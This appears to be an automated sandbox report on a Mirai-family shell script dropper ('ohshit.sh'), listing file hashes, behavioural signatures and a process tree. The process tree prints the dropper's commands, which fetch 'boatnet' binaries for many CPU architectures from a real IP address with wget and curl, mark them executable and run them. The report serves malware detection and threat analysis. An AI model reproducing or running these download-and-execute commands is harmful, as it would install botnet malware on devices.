Analysis
-
max time kernel
149s -
max time network
151s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
30-12-2024 16:46
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
7e24e03c8d6c1bafbc85a32aa065853f
-
SHA1
1399f7b9e79afa7fb910eb61f8e7d10b36c64310
-
SHA256
938aa70dc932c5e04d7b26226591bfa9c18180421958613bac79c72fbcd3145c
-
SHA512
0975c2aaae90e309467a37d38bdb48790c56c7efdfe9ad82a69c93d8cd2d25f4eee4e741222b1d455e04913e69380d52f81efe6c1b025e9ef1fd872a0fcac521
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1658 chmod 1684 chmod 1578 chmod 1594 chmod 1632 chmod 1646 chmod 1668 chmod 1518 chmod 1526 chmod 1602 chmod 1718 chmod 1726 chmod 1586 chmod 1622 chmod 1676 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 1519 WTF /tmp/WTF 1527 WTF /tmp/WTF 1579 WTF /tmp/WTF 1587 WTF /tmp/WTF 1595 WTF /tmp/WTF 1603 WTF /tmp/WTF 1623 WTF /tmp/WTF 1633 WTF /tmp/WTF 1647 WTF /tmp/WTF 1659 WTF /tmp/WTF 1669 WTF /tmp/WTF 1677 WTF /tmp/WTF 1685 WTF /tmp/WTF 1719 WTF /tmp/WTF 1727 WTF -
Modifies Watchdog functionality 1 TTPs 30 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/watchdog WTF -
Unexpected DNS network traffic destination 43 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 37.202.222.7 Destination IP 37.202.222.7 Destination IP 37.202.222.79 Destination IP 23.227.146.106 Destination IP 37.202.222.79 Destination IP 37.202.222.79 Destination IP 37.202.222.79 Destination IP 37.202.222.79 Destination IP 37.202.222.7 Destination IP 37.202.222.7 Destination IP 37.202.222.79 Destination IP 23.227.146.106 Destination IP 37.202.222.79 Destination IP 37.202.222.79 Destination IP 37.202.222.79 Destination IP 37.202.222.7 Destination IP 23.227.146.106 Destination IP 23.227.146.106 Destination IP 37.202.222.7 Destination IP 23.227.146.106 Destination IP 23.227.146.106 Destination IP 37.202.222.79 Destination IP 23.227.146.106 Destination IP 37.202.222.7 Destination IP 37.202.222.79 Destination IP 37.202.222.7 Destination IP 23.227.146.106 Destination IP 37.202.222.7 Destination IP 37.202.222.79 Destination IP 23.227.146.106 Destination IP 23.227.146.106 Destination IP 23.227.146.106 Destination IP 37.202.222.7 Destination IP 37.202.222.7 Destination IP 37.202.222.79 Destination IP 37.202.222.79 Destination IP 23.227.146.106 Destination IP 23.227.146.106 Destination IP 37.202.222.7 Destination IP 37.202.222.7 Destination IP 37.202.222.79 Destination IP 23.227.146.106 Destination IP 23.227.146.106 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 30 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF -
resource yara_rule behavioral1/files/fstream-1.dat upx -
description ioc Process File opened for reading /proc/1757/cmdline WTF File opened for reading /proc/1790/cmdline WTF File opened for reading /proc/1766/cmdline WTF File opened for reading /proc/1347/cmdline WTF File opened for reading /proc/1161/cmdline WTF File opened for reading /proc/1201/cmdline WTF File opened for reading /proc/1696/cmdline WTF File opened for reading /proc/1714/cmdline WTF File opened for reading /proc/1722/cmdline WTF File opened for reading /proc/1780/cmdline WTF File opened for reading /proc/1066/cmdline WTF File opened for reading /proc/1070/cmdline WTF File opened for reading /proc/1129/cmdline WTF File opened for reading /proc/1090/cmdline WTF File opened for reading /proc/1764/cmdline WTF File opened for reading /proc/1513/cmdline WTF File opened for reading /proc/655/cmdline WTF File opened for reading /proc/1139/cmdline WTF File opened for reading /proc/658/cmdline WTF File opened for reading /proc/1606/cmdline WTF File opened for reading /proc/680/cmdline WTF File opened for reading /proc/1662/cmdline WTF File opened for reading /proc/1672/cmdline WTF File opened for reading /proc/1702/cmdline WTF File opened for reading /proc/1347/cmdline WTF File opened for reading /proc/1723/cmdline WTF File opened for reading /proc/1736/cmdline WTF File opened for reading /proc/444/cmdline WTF File opened for reading /proc/787/cmdline WTF File opened for reading /proc/1339/cmdline WTF File opened for reading /proc/1143/cmdline WTF File opened for reading /proc/1767/cmdline WTF File opened for reading /proc/699/cmdline WTF File opened for reading /proc/1070/cmdline WTF File opened for reading /proc/1154/cmdline WTF File opened for reading /proc/1742/cmdline WTF File opened for reading /proc/1739/cmdline WTF File opened for reading /proc/677/cmdline WTF File opened for reading /proc/1567/cmdline WTF File opened for reading /proc/433/cmdline WTF File opened for reading /proc/1750/cmdline WTF File opened for reading /proc/1590/cmdline WTF File opened for reading /proc/497/cmdline WTF File opened for reading /proc/1115/cmdline WTF File opened for reading /proc/1723/cmdline WTF File opened for reading /proc/1070/cmdline WTF File opened for reading /proc/1662/cmdline WTF File opened for reading /proc/1751/cmdline WTF File opened for reading /proc/1739/cmdline WTF File opened for reading /proc/437/cmdline WTF File opened for reading /proc/1678/cmdline WTF File opened for reading /proc/1194/cmdline WTF File opened for reading /proc/1722/cmdline WTF File opened for reading /proc/1735/cmdline WTF File opened for reading /proc/1258/cmdline WTF File opened for reading /proc/688/cmdline WTF File opened for reading /proc/1723/cmdline WTF File opened for reading /proc/1735/cmdline WTF File opened for reading /proc/1760/cmdline WTF File opened for reading /proc/1193/cmdline WTF File opened for reading /proc/1736/cmdline WTF File opened for reading /proc/1771/cmdline WTF File opened for reading /proc/1688/cmdline WTF File opened for reading /proc/1686/cmdline WTF -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1524 curl 1523 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.sh4 curl File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.m68k curl File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.sh4 wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:1503 -
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1504
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1516
-
-
/bin/catcat boatnet.x862⤵PID:1517
-
-
/bin/chmodchmod +x boatnet.x86 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-PFxUxZ WTF2⤵
- File and Directory Permissions Modification
PID:1518
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1519
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1523
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1524
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-fYa9Yu systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-timedated.service-PFxUxZ WTF2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1527
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1531
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-ng3g0d systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1579
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.i4682⤵PID:1583
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.i4682⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-ng3g0d systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1587
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.i6862⤵PID:1591
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.i6862⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-ng3g0d systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1595
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.x86_642⤵PID:1599
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-ng3g0d systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1603
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1607
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-ZGUEam systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1623
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1627
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1633
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1637
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:1642
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1647
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1651
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-bolt.service-HoKljy systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1659
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1663
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:1666
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1668
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1669
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1673
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:1674
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1676
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1677
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1681
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:1682
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1684
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1685
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1689
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:1690
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1718
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1719
-
-
/usr/bin/wgetwget http://154.216.17.216/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:1723
-
-
/usr/bin/curlcurl -O http://154.216.17.216/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:1724
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-VFsj86 netplan_d37cv8st ohshit.sh snap-private-tmp ssh-rL7PsCwx0DGi systemd-private-54dc83d5f0cb448a8a705dc2207af724-colord.service-dlZ6iA systemd-private-54dc83d5f0cb448a8a705dc2207af724-ModemManager.service-DJCZ8V systemd-private-54dc83d5f0cb448a8a705dc2207af724-systemd-resolved.service-jQiNea WTF2⤵
- File and Directory Permissions Modification
PID:1726
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1727
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD5d2610e796559edd586be4f3cfea659da
SHA167ac4e25ed9856b839f2b11c32e758766a140e23
SHA25675754fcc1c6ecbdee1bc04eb2e4a986d6fb12a63e8a6b663a012ff41b031aef6
SHA512910228016a57f6c76fcf29e7bd0a4d79a6772cda30489b99d9a10b92a00f56fc6829b35460ee09bc99c9fa7dc9607763dd01f39c0730c9975988c595c58bdf7a